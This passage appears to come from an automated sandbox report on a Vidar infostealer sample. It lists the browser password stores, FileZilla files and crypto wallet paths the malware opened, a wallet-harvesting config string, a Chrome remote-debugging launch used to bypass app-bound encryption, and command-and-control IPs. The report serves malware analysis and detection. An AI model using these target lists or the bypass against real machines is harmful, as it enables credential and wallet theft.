          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Fine.comBinary or memory string: WIN_81
          Source: Fine.comBinary or memory string: WIN_XP
          Source: Fine.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: Fine.comBinary or memory string: WIN_XPe
          Source: Fine.comBinary or memory string: WIN_VISTA
          Source: Fine.comBinary or memory string: WIN_7
          Source: Fine.comBinary or memory string: WIN_8
          Source: Yara matchFile source: 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Fine.com PID: 1440, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Attempt to bypass Chrome Application-Bound Encryption
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00252263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00252263
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00251C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00251C61

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol4
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Registry Run Keys / Startup Folder          		1
          Extra Window Memory Injection          		2
          Obfuscated Files or Information          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		1
          Remote Access Software          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
          Valid Accounts          		1
          Software Packing          		NTDS27
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation          		1
          DLL Side-Loading          		LSA Secrets1
          Query Registry          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
          Process Injection          		1
          Extra Window Memory Injection          		Cached Domain Credentials121
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Registry Run Keys / Startup Folder          		111
          Masquerading          		DCSync1
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts          		Proc Filesystem4
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation          		Network Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589496 Sample: mNPTwHOuvT.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 65 LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgI 2->65 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 6 other signatures 2->89 10 mNPTwHOuvT.exe 30 2->10         started        13 msedge.exe 2->13         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\Logging, DOS 10->55 dropped 15 cmd.exe 2 10->15         started        19 msedge.exe 13->19         started        22 msedge.exe 13->22         started        24 msedge.exe 13->24         started        26 msedge.exe 13->26         started        process6 dnsIp7 57 C:\Users\user\AppData\Local\Temp\...\Fine.com, PE32 15->57 dropped 81 Drops PE files with a suspicious file extension 15->81 28 Fine.com 29 15->28         started        32 cmd.exe 2 15->32         started        34 conhost.exe 15->34         started        36 7 other processes 15->36 67 13.89.179.13, 443, 50075, 50107 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->67 69 20.110.205.119, 443, 50078, 50106 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->69 71 17 other IPs or domains 19->71 file8 signatures9 process10 dnsIp11 77 195.201.141.106, 443, 49851, 49860 HETZNER-ASDE Germany 28->77 79 127.0.0.1 unknown unknown 28->79 93 Attempt to bypass Chrome Application-Bound Encryption 28->93 95 Found many strings related to Crypto-Wallets (likely being stolen) 28->95 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->97 99 3 other signatures 28->99 38 msedge.exe 2 10 28->38         started        41 chrome.exe 8 28->41         started        44 cmd.exe 28->44         started        signatures12 process13 dnsIp14 91 Monitors registry run keys for changes 38->91 46 msedge.exe 38->46         started        73 192.168.2.5, 443, 49607, 49703 unknown unknown 41->73 75 239.255.255.250 unknown Reserved 41->75 48 chrome.exe 41->48         started        51 conhost.exe 44->51         started        53 timeout.exe 44->53         started        signatures15 process16 dnsIp17 59 plus.l.google.com 142.250.185.110, 443, 49954 GOOGLEUS United States 48->59 61 www.google.com 142.250.185.228, 443, 49923, 49924 GOOGLEUS United States 48->61 63 2 other IPs or domains 48->63

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mNPTwHOuvT.exe58%VirustotalBrowse
          mNPTwHOuvT.exe47%ReversingLabsWin32.Trojan.Etset

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\424372\Fine.com0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://195.201.141.106/q0%Avira URL Cloudsafe
          https://195.201.141.106Local0%Avira URL Cloudsafe
          https://116.203.165.2510%Avira URL Cloudsafe
          https://195.201.141.106R90%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          chrome.cloudflare-dns.com
          		162.159.61.3
          		truefalse
            		high
            plus.l.google.com
            		142.250.185.110
            		truefalse
              		high
              play.google.com
              		172.217.18.14
              		truefalse
                		high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                		94.245.104.56
                		truefalse
                  		high
                  sb.scorecardresearch.com
                  		18.244.18.27
                  		truefalse
                    		high
                    www.google.com
                    		142.250.185.228
                    		truefalse
                      		high
                      googlehosted.l.googleusercontent.com
                      		142.250.185.97
                      		truefalse
                        		high
                        clients2.googleusercontent.com
                        		unknown
                        		unknownfalse
                          		high
                          bzib.nelreports.net
                          		unknown
                          		unknownfalse
                            		high
                            assets.msn.com
                            		unknown
                            		unknownfalse
                              		high
                              c.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgI
                                		unknown
                                		unknownfalse
                                  		unknown
                                  ntp.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    apis.google.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      api.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://sb.scorecardresearch.com/b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                          		high
                                          https://c.msn.com/c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                            		high
                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698994931&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                              		high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698992881&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabFine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drfalse
                                                  		high
                                                  https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://google-ohttp-relay-join.fastly-edge.com/)chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drfalse
                                                          		high
                                                          https://google-ohttp-relay-join.fastly-edge.com//chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://google-ohttp-relay-join.fastly-edge.com/3chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/document/Jchrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/6chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
